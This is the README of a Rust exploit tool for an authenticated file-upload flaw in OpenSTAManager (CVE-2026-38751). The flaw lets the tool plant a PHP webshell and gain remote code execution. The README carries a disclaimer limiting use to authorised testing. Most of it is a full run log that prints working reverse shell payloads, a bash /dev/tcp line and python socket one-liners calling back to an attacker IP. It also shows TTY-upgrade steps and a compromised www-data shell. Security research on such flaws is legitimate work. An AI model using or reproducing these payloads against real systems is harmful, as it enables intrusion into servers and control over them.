Share 
## https://sploitus.com/exploit?id=52E3EC4D-B3B2-5A5A-B602-597C9814297E
# OpenSTAManager RCE Exploit (CVE-2026-38751)

**Arbitrary File Upload leading to Remote Code Execution**  
Full-featured proof-of-concept for **CVE-2026-38751**, written in **Rust**.

> ** Warning**: This tool is intended for **authorised security testing and educational purposes only**. Use it only on systems you own or have explicit permission to test.

---

## Description

OpenSTAManager ≤ 2.10 is vulnerable to an **authenticated arbitrary file upload** that allows an attacker to upload a malicious ZIP archive containing a PHP webshell. This PoC automates the process:

- Login with valid credentials
- Upload a malicious module with a webshell
- Verify the vulnerability
- **Interactive web shell** (command execution)
- **Reverse shell** with TTY handling (multiple payloads)
- Cleanup of the uploaded backdoor

---

## Features

| Feature | Description |
|---------|-------------|
| **Login** | Authenticates using provided credentials. |
| **ZIP generation** | Creates a ZIP file with a valid `MODULE` descriptor and a PHP shell. |
| **File upload** | Sends the malicious ZIP via the update mechanism. |
| **Verification** | Checks if the shell is reachable and executes a test command (`id`). |
| **Web‑shell interactive** | Lets you run commands interactively through the webshell (`-i`). |
| **Reverse shell** | Sends multiple payloads (bash, python, base64, nc, mkfifo) to get a shell. |
| **TTY upgrade instructions** | Shows step‑by‑step guide to get a fully interactive TTY. |
| **Cleanup** | Removes the uploaded `shell.php` automatically (unless `--no-cleanup`). |

---

## 🛠️ Requirements

- [Rust](https://www.rust-lang.org/tools/install) (1.70+)
- A **target** running OpenSTAManager ≤ 2.10.
- A **valid user account** (with password) to log in.

---

## Installation

Clone the repository and build the binary:

```c
git clone https://github.com/yourusername/OpenSTAManager-RCE-Exploit-CVE-2026-38751
cd OpenSTAManager-RCE-Exploit-CVE-2026-38751
cargo build --release
./target/release/openstamanager-rce-exploit --help
```

## Example:

```rust
$ ./openstamanager-rce-exploit --url http://target.com/ -U  -P  --lhost 10.10.14.5 --lport 4444

[ OpenSTAManager RCE Exploit : ]

Target: http://target.com/
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 500 Internal Server Error
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Listening on 10.10.14.5:4444...
[*] Trying payload: bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
[-] Payload failed: operation timed out
[*] Trying payload: python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[-] Payload failed: operation timed out
[*] Trying payload: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[+] Payload sent successfully. Waiting for connection...
[+] Connection received from 10.129.19.238:55758
[*] Sent 'script /dev/null -c bash'

[*]
[*] Reverse shell established.
[*] To get a fully interactive TTY:
[*] 1. Press Ctrl+Z to suspend the shell.
[*] 2. Run: stty raw -echo; fg
[*] 3. When prompted for terminal type, type: xterm
[*] 4. Export: export TERM=xterm SHELL=bash
[*] 5. Adjust rows/columns with: stty rows  columns 
[*]    (Get the size with: stty size)
[*]
[*] Press Ctrl+C to exit and cleanup the webshell.

bash: cannot set terminal process group (1481): Inappropriate ioctl for device
bash: no job control in this shell
www-data@target:~/html/openstamanager/modules/shell$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@target:~/html/openstamanager/modules/shell$ whoami
whoami
www-data
www-data@target:~/html/openstamanager/modules/shell$
```